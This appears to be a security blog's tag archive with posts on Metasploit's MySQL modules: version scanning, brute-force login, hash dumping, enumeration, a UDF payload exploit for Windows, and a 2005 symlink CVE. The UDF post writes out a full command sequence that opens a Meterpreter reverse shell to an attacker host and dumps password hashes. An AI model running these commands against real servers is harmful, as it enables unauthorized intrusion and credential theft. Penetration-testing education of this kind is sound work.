Tag Archives: MySQL

Metasploit MySQL Auxiliary Modules

Metasploit provide some MySQL database auxiliary modules who will permit you to scan the running version, do brute force login, execute sql queries and gather some useful informations.

You can find all these auxiliary modules through the Metasploit search command.

MySQL version scanner (mysql_version)

To invoke this auxiliary module just type the following command :

Just provide the target address range to the “RHOSTS” variable. “RHOSTS” variable could be an unique IP address, an IP addresses range (ex : 192.168.1.0-192.168.1.255, or 192.168.1.0/24) or a file (file:/tmp/ip_addresses.txt). In order to parallelize version scans, just increase the number of concurrent threads by setting the “THREADS” variable.

MySQL authentication brute force login (mysql_login)

To invoke this auxiliary module just type the following command :

This module attempts to authenticate against a MySQL instance using username and password combinations indicated by the “USER_FILE“, “PASS_FILE“, and “USERPASS_FILE” options. Metasploit doesn’t provide default “USER_FILE“, default “PASS_FILE” and default “USERPASS_FILE“. You can use SkullSecurity password lists, or my own list how is updated regularly. In order to parallelize brute force attempts, just increase the number of concurrent threads by setting the “THREADS” variable. Provide the target address range to the “RHOSTS” variable. “RHOSTS” variable could be a an unique IP address, an IP addresses range or a file.

Valid login attempts are displayed in green and non valid in red.

MySQL generic SQL query execution (mysql_sql)

To invoke this auxiliary module just type the following command :

This module will allow you to execute a simple SQL query against  a MySQL instance. The default SQL query will check the running version of MySQL database. You will require valid login and password previously discovered with the “mysql_login” auxiliary module. Provide the target serveur to the “RHOST” variable. “RHOST” variable should be an unique IP address.

Some useful SQL MySQL queries for pen testing are available on pentestmonkey website.

MySQL password hashdump (mysql_hashdump)

To invoke this auxiliary module just type the following command :

Provide the target address range to the “RHOSTS” variable. “RHOSTS” variable could be an unique IP address, an IP addresses range (ex : 192.168.1.0-192.168.1.255, or 192.168.1.0/24) or a file (file:/tmp/ip_addresses.txt). In order to parallelize scans, just increase the number of concurrent threads by setting the “THREADS” variable. You also need to have valid “USERNAME” and “PASSWORD“, maybe obtained through the “mysql_login” auxiliary module.

MySQL enumeration (mysql_enum)

To invoke this auxiliary module just type the following command :

This auxiliary module will allow you to gather useful informations from a MySQL server :

  • The MySQL version
  • The MySQL OS compilation target
  • The server architecture
  • The server hostname
  • The MySQL datas directory location
  • If logging of queries and logins is activated or not, and log files location
  • If the old password hashing algorithm support is activated or not
  • If local files loading (infile) is activated or not
  • If logins with old Pre-4.1 passwords is authorized or not
  • If the “–skip-grant-tables” option is activated or not
  • If symlinks are authorized to be used for database files
  • If table merges are allowed
  • If the “–safe-show-database” option is activated or not
  • If SSL connexions are enabled or not
  • All accounts with their password hashes
  • List of accounts that can log in with SSL if SSL is enabled
  • List of all accounts with “GRANT“, “CREATE USER”, RELOAD“, “SHUTDOWN“, “SUPER“, “FILE” and “PROCESS” privileges.
  • List of all accounts with “SELECT“, “INSERT“, “UPDATE“, “DELETE“, “CREATE” and “DROP” privileges.
  • List of all anonymous accounts.
  • List of all accounts without passwords
  • List of all accounts with host wildcard authorized access.
To use this auxiliary module you need to have a access to the database with a privileges user account, maybe gathered with the “mysql_login” auxiliary module. Provide the target serveur to the “RHOST” variable. “RHOST” variable should be an unique IP address.

Oracle MySQL UDF for Microsoft Windows Metasploit Payload Execution

Timeline :

The vulnerability seem to exist since 2007 !
Vulnerability discovered and disclosed by Bernardo Damele the 2009-01-16
Metasploit PoC provided by todb the 2011-03-08

PoC provided by :

Bernardo Damele
todb

Reference(s) :

NONE

Affected version(s) :

All Microsoft Windows MySQL, how support UDF, due to the fact that default MySQL installation is done with SYSTEM privileges.

Tested on Windows XP SP3 with :

MySQL Community 5.5.9

Description :

This module creates and enables a custom UDF (user defined function) on the target host via the SELECT … into DUMPFILE method of binary injection. On default Microsoft Windows installations of MySQL (=< 5.5.9), directory write permissions not enforced, and the MySQL service runs as LocalSystem. NOTE: This module will leave a payload executable on the target system when the attack is finished, as well as the UDF DLL, and will define or redefine sys_eval() and sys_exec() functions.

To exploit this weakness, the MySQL targeted user should have the following global privileges :

grant select,insert,file, create routine,alter routine,execute on *.* to test3@’%’ identified by ‘test3’;

Commands :

use exploit/windows/mysql/mysql_payload
set RHOST 192.168.178.41
set USERNAME test3
set PASSWORD test3

set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

getuid
hashdump

CVE-2005-1636 MySQL mysql_install_db Symlink Arbitrary File Overwrite

Timeline :

Vulnerability discovered by Eric Romang the 2005-05-07
Vendor notified the 2005-05-09
Coordinated vulnerability disclosure the 2005-05-17

Reference(s) :

CVE-2005-1636
OSVDB-16689

Affected version(s) :

MySQL before or equal to 4.0.12
MySQL before or equal to 5.0.4

Description :

mysql_install_db in MySQL 4.1.x before 4.1.12 and 5.x up to 5.0.4 creates the mysql_install_db.X file with a predictable filename and insecure permissions, which allows local users to execute arbitrary SQL commands by modifying the file’s contents.